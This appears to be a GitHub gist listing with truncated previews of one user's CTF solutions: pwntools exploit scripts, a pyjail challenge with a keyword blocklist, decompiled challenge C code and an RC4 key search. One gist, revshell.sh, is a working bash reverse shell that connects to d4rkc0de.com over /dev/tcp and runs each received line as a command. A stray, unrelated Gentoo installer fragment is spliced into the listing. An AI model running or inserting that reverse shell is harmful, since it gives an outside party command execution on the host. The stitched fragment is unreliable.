Aneesh Dogra lionaneesh

lionaneesh / solve_saas.py
Created June 14, 2020 09:21
SaaS from Nahamcon CTF 2020
from pwn import *
# Open a TCP connection to the hosted challenge service; `r` is the tube
# that the rest of the script reads from and writes to.
r = remote('jh2i.com', 50016)
# Local alternative, left disabled: run the ./saas binary as a child process.
#r = process('./saas')
def syscall(a2):
    """Send every value in a2 to the remote service, one line per value.

    Before each send, whatever the service has written so far is read
    (2 second timeout) and echoed together with its length, which makes
    the prompt/response exchange visible while debugging. Uses the
    module-level tube `r`.

    NOTE(review): this listing is a preview with its indentation lost;
    the nesting below is reconstructed and the function may continue
    past the last visible line. Presumably a2 holds a syscall number
    followed by its arguments (going by the name) -- confirm.
    """
    print ("syscall", a2)
    for a in a2:
        # Drain the pending prompt so the next value answers the right question.
        txt = r.recv(timeout=2).strip()
        print (txt.strip(), len(txt))
        # Values are sent in their decimal text form, newline-terminated.
        r.sendline(str(a))
#!/usr/bin/env bash
# Script identity, copyright, license and version strings.
# How they are consumed is not visible in this preview.
NAME="Gentoo Install"
CODENAME="gentooinstall"
COPYRIGHT="Copyright (C) 2016 Nathan Shearer"
LICENSE="GNU General Public License 2.0"
VERSION="2.0.0.0"
function gentooinstall_architecture
{
lionaneesh / revshell.sh
Created April 1, 2020 12:29
revshell.sh
# Opens file descriptor 5 for reading and writing on bash's /dev/tcp
# pseudo-path. bash handles this path itself (it is not a real device file)
# and turns it into an outbound TCP connection to the named host and port.
exec 5<>/dev/tcp/d4rkc0de.com/2334
# Reads the connection line by line and runs each line as a command, with
# stdout and stderr redirected back to fd 5. `$line` is unquoted, so it is
# word-split and run as a simple command.
# Detection: a `/dev/tcp/` path in a shell command line or script, or a bash
# process holding an outbound socket, is a common signal to alert on.
# Egress filtering on the host or network blocks the connection.
cat <&5 | while read line; do $line 2>&5 >&5; done
lionaneesh / emu_2_parse.py
Created December 23, 2019 10:57
Solution for EMU 2.0, X-Mas CTF 2019: parsing a custom 8-bit RISC microprocessor.
# Emulator register state. 'pc' starts at 0x100; presumably 'a' is the
# accumulator and 'pc' the program counter -- confirm against the opcode
# handlers, which are only partly visible in this preview.
state = {'a': 0, 'pc': 0x100}
# Starts empty; presumably the emulated memory image, filled elsewhere.
mem = []
# Starts empty; what makes an address "blocked" is not visible here.
blocked_addrs = []
def parse_opcode(opcode, arg):
global state
global mem
global blocked_addrs
jumped = False
x = int(arg, base=16)
lionaneesh / solve_horcruxes.py
Last active November 28, 2019 08:32
Ropping Horcruxes, pwnable.kr
from pwn import *
import re
#r = process("/home/horcruxes/horcruxes")
r = remote('0.0.0.0', 9032)
print r.recvuntil("Select Menu:")
r.send("123\n")
print r.recvuntil("earned? : ")
a = p32(0x809fe4b)
b = p32(0x809fe6a)
c = p32(0x809fe89)
lionaneesh / solve_dragon.py
Created November 18, 2019 10:35
Solve the Dragon (rookiss) from pwnable.kr
from pwn import *
# Local alternative, left disabled: run the ./dragon binary as a child process.
#r = process('./dragon')
# TCP connection to the hosted challenge; `r` is the tube used below.
r = remote("pwnable.kr", 9004)
# 0x08048dbf packed into 4 bytes (little-endian under pwntools' default
# context). The name suggests a code address inside the challenge binary;
# what lives there is not visible in this preview -- confirm.
win = p32(0x08048dbf)
def select_priest():
print r.recvuntil("[ 2 ] Knight")
r.send("1\n")
lionaneesh / pyjail.py
Created November 5, 2019 10:50
pyjail, N-CTF 2019
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to pyjail!")
print("========================================================================")
print(open(__file__).read())
print("========================================================================")
print("RUN")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
lionaneesh / rms-fixed-make_request.c
Created September 23, 2019 16:03
rms-fixed, make_request, from DragonCTF 2019
signed __int64 __fastcall make_request(const struct sockaddr *a1, socklen_t a2, char *a3, char *a4, void **a5, _QWORD *a6)
{
int *v6; // rax
signed __int64 result; // rax
int *v8; // rax
size_t v9; // rax
int *v10; // rax
size_t v11; // rax
int *v12; // rax
int *v13; // rax
lionaneesh / rms-fixed.c
Created September 23, 2019 15:45
rms-fixed, source code from Dragon CTF 2019
void *__fastcall fetch(void *url_1)
{
int v1; // eax
char *v2; // rax
__int64 v3; // rdx
int *v4; // rax
void *dest; // ST78_8
uint16_t port_network; // [rsp+1Ah] [rbp-116h]
int portnumber; // [rsp+1Ch] [rbp-114h]
char *hostname; // [rsp+20h] [rbp-110h]
lionaneesh / solve_droidcon.py
Created September 19, 2019 21:24
DroidCon, Sect-ctf 2019, RC4 decrypt
from arc4 import ARC4
data='\xef\x8eX7 CD\xcc\xfb!\x03@\xf5\x10\xf8 \x18\x986\xc09\xcf\x87/\xc2h\xd1\x94\xc6\x83\xfb;aG\xfat\n\xda^\x0f\xb8\xe1]d\xb6=\xd7\xa4\x0216:\x0f\xf8\xf6j\xdeN\xc3\xd5\x82z$^\xfa\xc0\xea\xab\x14\xf1qB\x80\x9c\xc5Z\xd5\xf8\xc0(H\\2\x17_\xa0\xef\xf4\x16q\x00\xbd\x17q\xfd\x10\xef\x17\xe6\xb6\x86\xea[\xb7:\x1c\x85\x8evJ!\x1a\x9d\x00\xefP\x9eml=\x13*g3\x7f\xc7\x97\xb4\xb6'
def decrypt(key):
    """Try `key` as the RC4 key for the module-level `data` blob.

    The decrypted result is printed, together with the key, only when its
    string form contains 'flag'; nothing is returned.

    NOTE(review): this listing is a preview with its indentation lost;
    the nesting below is reconstructed and the function may continue
    past the last visible line.
    """
    # A fresh cipher object per call: RC4 keystream state advances with use,
    # so one object cannot be reused across candidate keys.
    arc4 = ARC4(key)
    config = arc4.decrypt(data)
    # Substring test is done on the str() form of whatever decrypt() returns.
    config = str(config)
    if('flag' in config):
        print(config, key)